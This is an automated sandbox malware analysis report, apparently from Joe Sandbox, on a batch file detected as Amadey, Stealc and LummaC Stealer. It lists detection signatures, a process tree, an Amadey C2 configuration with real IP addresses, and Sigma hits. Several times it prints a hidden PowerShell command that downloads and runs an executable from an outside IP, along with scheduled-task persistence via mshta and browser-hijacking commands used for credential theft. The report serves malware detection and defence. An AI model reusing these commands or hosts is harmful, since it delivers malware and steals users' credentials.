Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
am_no.bat

Overview

General Information

Sample name:am_no.bat
Analysis ID:1632121
MD5:cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1:b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256:5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
Tags:092155Amadeybatuser-aachum
Infos:

Detection

Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Credential Flusher
Yara detected Healer AV Disabler
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected obfuscated html page
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain checking for user administrative privileges
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies windows update settings
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • timeout.exe (PID: 6972 cmdline: timeout /t 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 7056 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7072 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5032 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6184 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6440 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6476 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • schtasks.exe (PID: 6664 cmdline: schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • mshta.exe (PID: 6736 cmdline: mshta "C:\Temp\mtzRdqIHD.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 4764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 483d2fa8a0d53818306efeb32d3.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
          • rapes.exe (PID: 6456 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
  • mshta.exe (PID: 6660 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\mtzRdqIHD.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 483d2fa8a0d53818306efeb32d3.exe (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
      • svchost.exe (PID: 7112 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 34A1010B4F6CF9C985D71453702602D7)
  • svchost.exe (PID: 4028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 4700 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 34A1010B4F6CF9C985D71453702602D7)
    • 2qv26zF.exe (PID: 6652 cmdline: "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe" MD5: 903EB4BCB7F7479A651A0813E69FFAD9)
      • spoolsv.exe (PID: 3128 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
    • 19be97887a.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" MD5: DA0CBB9E2A1C51DCC66D381F995F48B4)
    • bb5ad48269.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe" MD5: B083B881D7C60C5ECD8E4BD354043178)
    • c6e8248d4e.exe (PID: 6080 cmdline: "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe" MD5: D9C528B98DEC61D94D18A752ED8EA2C7)
      • taskkill.exe (PID: 5960 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3572 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6028 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5380 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4232 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 2384 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • taskkill.exe (PID: 6372 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ab5415a7b5.exe (PID: 5236 cmdline: "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe" MD5: B55E5FB40A834E5F53D181D91C21F5C8)
    • 6f3323f1e6.exe (PID: 6692 cmdline: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" MD5: E898E590B906BE9CE110FBBB538EF93E)
      • cmd.exe (PID: 2712 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 19be97887a.exe (PID: 1496 cmdline: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" MD5: DA0CBB9E2A1C51DCC66D381F995F48B4)
    • chrome.exe (PID: 5820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • firefox.exe (PID: 6552 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 2096 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 3680 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • bb5ad48269.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe" MD5: B083B881D7C60C5ECD8E4BD354043178)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\fJeYDlA9n.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    C:\Temp\mtzRdqIHD.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                Click to see the 27 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                35.2.19be97887a.exe.e20000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_4764.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_5884.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe, ParentProcessId: 6692, ParentProcessName: 6f3323f1e6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2712, ProcessName: cmd.exe
                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe, ParentProcessId: 6692, ParentProcessName: 6f3323f1e6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2712, ProcessName: cmd.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 4700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19be97887a.exe
                      Sigma detected: PowerShell DownloadFile
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
                      Sigma detected: Browser Started with Remote Debugging
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, ParentProcessId: 1496, ParentProcessName: 19be97887a.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, ProcessId: 5820, ProcessName: chrome.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 4700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19be97887a.exe
                      Sigma detected: PowerShell Download Pattern
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 7112, ProcessName: svchost.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
